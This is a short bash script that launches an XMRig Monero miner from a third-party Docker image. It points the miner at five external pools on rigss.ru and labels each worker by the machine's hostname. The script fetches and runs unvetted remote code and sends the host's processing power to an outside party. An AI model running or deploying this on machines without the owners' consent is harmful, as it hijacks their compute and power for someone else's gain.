#!/bin/bash
docker run --read-only -it --name xmrig --rm abrakadabra21099/alpine-xmrig --donate-level=1 --cpu-priority=0 -O $HOSTNAME:x --rig-id=$HOSTNAME -o rig5.rigss.ru:7773 -o rig4.rigss.ru:7773 -o rig3.rigss.ru:7773 -o rig2.rigss.ru:7773 -o rig1.rigss.ru:7773
